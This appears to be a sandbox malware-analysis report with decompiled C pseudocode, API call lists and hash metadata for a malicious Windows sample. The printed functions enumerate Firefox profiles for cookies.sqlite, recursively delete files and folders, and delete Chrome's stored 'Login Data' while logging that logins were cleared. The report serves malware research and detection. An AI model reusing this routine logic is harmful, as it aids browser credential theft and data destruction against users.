                0x00451017
                0x00451028
                0x0045102d
                0x0045102f
                0x0045108f
                0x00450fb2
                0x00450fc2
                0x00450fc2
                0x0045103e
                0x0045104e
                0x00451054
                0x00451056
                0x00000000
                0x00000000
                0x0045106d
                0x00451073
                0x00451075
                0x00000000
                0x00000000
                0x00451087
                0x00000000
                0x0045108c
                0x00450fb0
                0x00000000
                0x00450fb0
                0x00450f5a
                0x00450f5c
                0x00450f60
                0x00450f76
                0x00450f67
                0x00450f6b
                0x00450f6b
                0x00450f7b
                0x00000000
                0x00450f7b
                0x00450f39

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00450F9C
                • IsValidCodePage.KERNEL32(00000000), ref: 00450FF7
                • IsValidLocale.KERNEL32(?,00000001), ref: 00451006
                • GetLocaleInfoW.KERNEL32(?,00001001,m3D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045104E
                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045106D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                • String ID: m3D$m3D$m3D
                • API String ID: 745075371-2721598275
                • Opcode ID: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                • Instruction ID: ce2d0ce6400888a1d824562178e0f2167d8bdbd9356f1224e449ae4cf6748fee
                • Opcode Fuzzy Hash: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                • Instruction Fuzzy Hash: 1851A6769002059BEB30DFA5CC45ABFB7B8AF04702F14446BFD04E7292D7B89948CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B8C7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040B8C7(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __edi;
				void* __ebp;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				void* _t42;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;

				_t61 = __ebx;
				_t95 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t96, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
				L004086C6(__ebx,  &_v28, _t93, _t96, L"\\Mozilla\\Firefox\\Profiles\\");
				_t91 =  &_v28;
				_t94 = FindFirstFileW(E00401EE4(E004087F0( &_v100,  &_v28, _t96, "*")),  &_v740);
				E00401EE9();
				if(_t94 != 0xffffffff) {
					E004020BF(_t61,  &_v76);
					while(1) {
						_t37 = FindNextFileW(_t94,  &_v740);
						__eflags = _t37;
						if(_t37 == 0) {
							break;
						}
						__eflags = _v740.dwFileAttributes & 0x00000010;
						if((_v740.dwFileAttributes & 0x00000010) == 0) {
							continue;
						} else {
							_t39 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), 0x4644f0);
							__eflags = _t39;
							if(_t39 == 0) {
								continue;
							} else {
								_t41 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), L"..");
								__eflags = _t41;
								if(_t41 == 0) {
									continue;
								} else {
									_t42 = E0040415E(_t61,  &_v148, _t91, _t96, L"\\cookies.sqlite");
									_t91 = E004087F0( &_v124,  &_v28, _t96,  &(_v740.cFileName));
									E00402F85( &_v52, _t44, _t42);
									E00401EE9();
									E00401EE9();
									__eflags = PathFileExistsW(E00401EE4( &_v52));
									if(__eflags != 0) {
										FindClose(_t94);
										E00403242(_t61, _t95, _t96, __eflags,  &_v52);
										E00401EE9();
									} else {
										E00401EE9();
										continue;
									}
								}
							}
						}
						L10:
						E00401FB8();
						goto L11;
					}
					FindClose(_t94);
					E0040415E(_t61, _t95, _t91, _t96, 0x46a8f0);
					goto L10;
				} else {
					E0040415E(_t61, _t95,  &_v28, _t96, 0x46a8f0);
				}
				L11:
				E00401EE9();
				return _t95;
			}




















                0x0040b8c7
                0x0040b8d7
                0x0040b8e3
                0x0040b8f0
                0x0040b901
                0x0040b91e
                0x0040b920
                0x0040b928
                0x0040b93e
                0x0040b9e0
                0x0040b9e8
                0x0040b9ee
                0x0040b9f0
                0x00000000
                0x00000000
                0x0040b948
                0x0040b94f
                0x00000000
                0x0040b955
                0x0040b961
                0x0040b968
                0x0040b96a
                0x00000000
                0x0040b96c
                0x0040b978
                0x0040b97f
                0x0040b981
                0x00000000
                0x0040b983
                0x0040b98e
                0x0040b9a7
                0x0040b9ac
                0x0040b9b5
                0x0040b9c0
                0x0040b9d4
                0x0040b9d6
                0x0040ba22
                0x0040ba2e
                0x0040ba36
                0x0040b9d8
                0x0040b9db
                0x00000000
                0x0040b9db
                0x0040b9d6
                0x0040b981
                0x0040b96a
                0x0040ba09
                0x0040ba0c
                0x00000000
                0x0040ba0c
                0x0040b9f7
                0x0040ba04
                0x00000000
                0x0040b92a
                0x0040b931
                0x0040b931
                0x0040ba11
                0x0040ba14
                0x0040ba20

                APIs
                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B915
                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B9E8
                • FindClose.KERNEL32(00000000), ref: 0040B9F7
                • FindClose.KERNEL32(00000000), ref: 0040BA22
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$CloseFile$FirstNext
                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                • API String ID: 1164774033-405221262
                • Opcode ID: c6b35922493ba9ddbbeef7d75a72d5dd9f157759eec42a5c671cc846564c5eaf
                • Instruction ID: f7360795b1d381be77360ebb1d09811b65db7e4dd05c1cd4fb36acbf7292fd34
                • Opcode Fuzzy Hash: c6b35922493ba9ddbbeef7d75a72d5dd9f157759eec42a5c671cc846564c5eaf
                • Instruction Fuzzy Hash: 02315031A042195ACB14F7A2DC9AAEE77B8EF50718F10047FF501B21D2EF789A458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041AC0A Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041AC0A(WCHAR* __ecx, void* __edx) {
				short _v524;
				short _v1044;
				struct _WIN32_FIND_DATAW _v1636;
				int _t41;
				long _t42;
				int _t51;
				signed int _t60;
				void* _t70;
				WCHAR* _t71;
				void* _t72;

				_t70 = __edx;
				_t71 = __ecx;
				E0043E0D9( &_v1044, __ecx);
				E0043E0FB( &_v1044, L"\\*");
				E0043E0D9( &_v524, _t71);
				E0043E0FB( &_v524, "\\");
				_t72 = FindFirstFileW( &_v1044,  &_v1636);
				if(_t72 == 0xffffffff) {
					L16:
					__eflags = 0;
					return 0;
				}
				E0043E0D9( &_v1044,  &_v524);
				_t60 = 1;
				do {
					_t41 = FindNextFileW(_t72,  &_v1636);
					_t76 = _t41;
					if(_t41 == 0) {
						_t42 = GetLastError();
						__eflags = _t42 - 0x12;
						if(_t42 != 0x12) {
							L15:
							FindClose(_t72);
							goto L16;
						}
						_t60 = 0;
						__eflags = 0;
						goto L13;
					}
					if(E0041ABDC( &(_v1636.cFileName), _t76) != 0) {
						goto L13;
					}
					E0043E0FB( &_v524,  &(_v1636.cFileName));
					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
						__eflags = _v1636.dwFileAttributes & 0x00000001;
						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v524, 0x80);
						}
						_t51 = DeleteFileW( &_v524);
						__eflags = _t51;
						if(_t51 == 0) {
							goto L15;
						} else {
							L10:
							E0043E0D9( &_v524,  &_v1044);
							goto L13;
						}
					}
					if(E0041AC0A( &_v524, _t70) == 0) {
						goto L15;
					}
					RemoveDirectoryW( &_v524);
					goto L10;
					L13:
				} while (_t60 != 0);
				FindClose(_t72);
				return RemoveDirectoryW(_t71);
			}













                0x0041ac0a
                0x0041ac1c
                0x0041ac20
                0x0041ac31
                0x0041ac3e
                0x0041ac4f
                0x0041ac6b
                0x0041ac70
                0x0041ad61
                0x0041ad61
                0x00000000
                0x0041ad61
                0x0041ac84
                0x0041ac8b
                0x0041ac8d
                0x0041ac95
                0x0041ac9b
                0x0041ac9d
                0x0041ad35
                0x0041ad3b
                0x0041ad3e
                0x0041ad5a
                0x0041ad5b
                0x00000000
                0x0041ad5b
                0x0041ad40
                0x0041ad40
                0x00000000
                0x0041ad40
                0x0041acb0
                0x00000000
                0x00000000
                0x0041acc4
                0x0041acd2
                0x0041acf2
                0x0041acf9
                0x0041ad07
                0x0041ad07
                0x0041ad14
                0x0041ad1a
                0x0041ad1c
                0x00000000
                0x0041ad1e
                0x0041ad1e
                0x0041ad2c
                0x00000000
                0x0041ad32
                0x0041ad1c
                0x0041ace1
                0x00000000
                0x00000000
                0x0041acea
                0x00000000
                0x0041ad42
                0x0041ad42
                0x0041ad4b
                0x00000000

                APIs
                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD07
                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD14
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                • GetLastError.KERNEL32(?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD35
                • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD5B
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                • String ID:
                • API String ID: 2341273852-0
                • Opcode ID: 0f390db9b924e7f4cc6de0f128792a69a8e67dbc017e2262d63da9aebc2805e1
                • Instruction ID: 3339c7fc43e202b61d2d70908da88035b8b5669b3a5f9347cfb7e72bae01768d
                • Opcode Fuzzy Hash: 0f390db9b924e7f4cc6de0f128792a69a8e67dbc017e2262d63da9aebc2805e1
                • Instruction Fuzzy Hash: 5E31A07280622C9ACB20E761AC48EDB777CAF04305F0401FBF545D2191EF78DAD48A5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00447A10 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 76%
                			E00447A10(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044764F();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004476AD( &_v8) != 0 || E00447655( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044764F();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004476AD( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043A5E8();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46f00c; // 0xd60a1515
						_v100 = _t74 ^ _t192;
						 *0x46f344 =  *0x46f344 | 0xffffffff;
						 *0x46f338 =  *0x46f338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x470758 = 0;
						_t78 = E0043A9B5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E00444A38(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E0043A9B5(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E00445002(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E00445002();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00447A10(_t139, _t172, _t183, __eflags);
							}
						}
						E00445002(_t183);
						__eflags = _v16 ^ _t192;
						return E004338BB(_v16 ^ _t192);
					} else {
						_t89 = E00447655( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E00447681( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E00445002( *0x470750);
								 *0x470750 = 0;
								 *_t194 = 0x470760;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x470760 * 0x3c;
									_t167 =  *0x4707b4; // 0x0
									_push(_t171);
									 *0x470758 = 1;
									_v12 = _t150;
									__eflags =  *0x4707a6; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x4707fa; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x470808; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E00444607(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x470764, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x4707b8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00447649()) = _v12;
								 *((intOrPtr*)(E0044763D())) = _v16;
								_t96 = E00447643();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x470750; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E00445002(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x447e01
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x447e02
						 *0x470750 = E00444A38(_t154 - _t169, _t13);
						_t116 = E00445002(0);
						_t170 =  *0x470750; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x447e01
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x447e02
							_t119 = E0044030E(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E00440303(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E0043A3AC(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E0043A3AC(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E0043A3AC(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00447649()) = _v8;
										_t128 = E0044763D();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E00440303(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}




































































                0x00447a10
                0x00447a10
                0x00447a1a
                0x00447a1f
                0x00447a23
                0x00447a25
                0x00447a2d
                0x00447a38
                0x00447bd8
                0x00447bda
                0x00447bdb
                0x00447bdc
                0x00447bdd
                0x00447bde
                0x00447bdf
                0x00447be4
                0x00447be8
                0x00447bea
                0x00447bed
                0x00447bf4
                0x00447bfb
                0x00447bff
                0x00447c02
                0x00447c05
                0x00447c0a
                0x00447c0b
                0x00447c0d
                0x00447d35
                0x00447d35
                0x00447d36
                0x00447d37
                0x00447d38
                0x00447d39
                0x00447d3a
                0x00447d3f
                0x00447d42
                0x00447d43
                0x00447d4b
                0x00447d52
                0x00447d55
                0x00447d62
                0x00447d69
                0x00447d6a
                0x00447d6b
                0x00447d6c
                0x00447d71
                0x00447d80
                0x00447d87
                0x00447d8f
                0x00447d91
                0x00447d9b
                0x00447d9e
                0x00447dab
                0x00447dae
                0x00447db0
                0x00447dc9
                0x00447dd1
                0x00447dd3
                0x00447dd9
                0x00447dde
                0x00447dd5
                0x00447dd5
                0x00000000
                0x00447dd5
                0x00447db2
                0x00447db2
                0x00447db3
                0x00447db3
                0x00447db3
                0x00447de0
                0x00447d93
                0x00447d93
                0x00447d93
                0x00447ded
                0x00447def
                0x00447df1
                0x00447df3
                0x00447e03
                0x00447e03
                0x00447df5
                0x00447df5
                0x00447df8
                0x00000000
                0x00447dfa
                0x00447dfa
                0x00447dfb
                0x00447e00
                0x00447df8
                0x00447e09
                0x00447e14
                0x00447e1f
                0x00447c13
                0x00447c17
                0x00447c1c
                0x00447c1d
                0x00447c1f
                0x00000000
                0x00447c25
                0x00447c29
                0x00447c2e
                0x00447c2f
                0x00447c31
                0x00000000
                0x00447c37
                0x00447c3d
                0x00447c42
                0x00447c48
                0x00447c4f
                0x00447c55
                0x00447c58
                0x00447c5e
                0x00447c65
                0x00447c6b
                0x00447c6f
                0x00447c75
                0x00447c78
                0x00447c7f
                0x00447c84
                0x00447c84
                0x00447c86
                0x00447c86
                0x00447c89
                0x00447c90
                0x00447ca8
                0x00447ca8
                0x00447cab
                0x00447c92
                0x00447c92
                0x00447c97
                0x00447c99
                0x00000000
                0x00447c9b
                0x00447c9d
                0x00447ca3
                0x00447ca3
                0x00447c99
                0x00447cb3
                0x00447cc7
                0x00447ccd
                0x00447ccf
                0x00447cdd
                0x00447cdf
                0x00447cd1
                0x00447cd1
                0x00447cd4
                0x00000000
                0x00447cd6
                0x00447cd8
                0x00447cd8
                0x00447cd4
                0x00447cf4
                0x00447cfb
                0x00447cfd
                0x00447d0c
                0x00447d0f
                0x00447cff
                0x00447cff
                0x00447d02
                0x00000000
                0x00447d04
                0x00447d07
                0x00447d07
                0x00447d02
                0x00447cfd
                0x00447d19
                0x00447d23
                0x00447d28
                0x00447d2d
                0x00447d34
                0x00447d34
                0x00447c31
                0x00447c1f
                0x00447a50
                0x00447a50
                0x00447a56
                0x00447a5b
                0x00447a91
                0x00447a92
                0x00447a98
                0x00447a9a
                0x00447a9a
                0x00447a9d
                0x00447a9d
                0x00447a9f
                0x00447aa0
                0x00447aa6
                0x00447ab1
                0x00447ab6
                0x00447abb
                0x00447ac5
                0x00000000
                0x00447acb
                0x00447acb
                0x00447acd
                0x00447ace
                0x00447ace
                0x00447ad1
                0x00447ad1
                0x00447ad3
                0x00447ad4
                0x00447adb
                0x00447ae0
                0x00447ae5
                0x00447aea
                0x00447af2
                0x00447af3
                0x00447af9
                0x00447afe
                0x00447b03
                0x00447b09
                0x00447b0e
                0x00447b0f
                0x00447b12
                0x00000000
                0x00000000
                0x00000000
                0x00447b12
                0x00447b17
                0x00447b18
                0x00447b1d
                0x00447b1f
                0x00447b1f
                0x00447b27
                0x00447b2d
                0x00447b30
                0x00447b30
                0x00447b34
                0x00000000
                0x00000000
                0x00447b3e
                0x00447b3e
                0x00447b41
                0x00447b44
                0x00447b46
                0x00447b54
                0x00447b56
                0x00447b60
                0x00447b60
                0x00447b62
                0x00447b64
                0x00000000
                0x00000000
                0x00447b5b
                0x00447b5d
                0x00447b5f
                0x00447b5f
                0x00000000
                0x00447b5f
                0x00000000
                0x00447b5d
                0x00447b66
                0x00447b69
                0x00447b6b
                0x00447b76
                0x00447b78
                0x00447b82
                0x00447b82
                0x00447b84
                0x00447b86
                0x00000000
                0x00000000
                0x00447b7d
                0x00447b7f
                0x00447b81
                0x00447b81
                0x00000000
                0x00447b81
                0x00000000
                0x00447b7f
                0x00447b82
                0x00447b69
                0x00447b88
                0x00447b88
                0x00447b8a
                0x00447b8e
                0x00447b8e
                0x00447b93
                0x00447b95
                0x00447b98
                0x00447b9b
                0x00447b9d
                0x00447ba0
                0x00447bb8
                0x00447bbb
                0x00447bbe
                0x00447bc6
                0x00447bcb
                0x00447bd0
                0x00000000
                0x00447bd0
                0x00447ba2
                0x00447ba7
                0x00447baa
                0x00447baf
                0x00447bb2
                0x00447bb4
                0x00000000
                0x00000000
                0x00447bb6
                0x00447b03
                0x00000000
                0x00447aea
                0x00447a5d
                0x00447a5d
                0x00447a5f
                0x00447a61
                0x00447a61
                0x00447a65
                0x00000000
                0x00000000
                0x00447a69
                0x00447a7d
                0x00447a7d
                0x00447a6b
                0x00447a6b
                0x00447a6b
                0x00447a71
                0x00000000
                0x00447a73
                0x00447a73
                0x00447a76
                0x00447a7b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00447a7b
                0x00447a71
                0x00447a86
                0x00447a88
                0x00447bd7
                0x00447bd7
                0x00447a8e
                0x00447a8e
                0x00000000
                0x00447a8e
                0x00000000
                0x00447a88
                0x00447a81
                0x00447a83
                0x00447a83
                0x00000000
                0x00447a83
                0x00447a5b
                0x00000000

                APIs
                • _free.LIBCMT ref: 00447A92
                • _free.LIBCMT ref: 00447AB6
                • _free.LIBCMT ref: 00447C3D
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                • _free.LIBCMT ref: 00447E09
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                • String ID:
                • API String ID: 314583886-0
                • Opcode ID: 129d8246206faee2f38877ab82131a60def34f9d9ec2b9cdd89c400090bd8217
                • Instruction ID: 0aa257e2c35749d2f3a928c6468fe730eac10fb1cea6214ff30b616faf06b30b
                • Opcode Fuzzy Hash: 129d8246206faee2f38877ab82131a60def34f9d9ec2b9cdd89c400090bd8217
                • Instruction Fuzzy Hash: 14C15971908245ABFB149F79DC41AAB7BA9EF41318F1440AFE484A7341E7389E43CB9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040AF8C Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E0040AF8C(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401FB8();
				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402073(_t20, _t28, _t31, _t33);
						E0040B752(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB8();
				return _t21;
			}














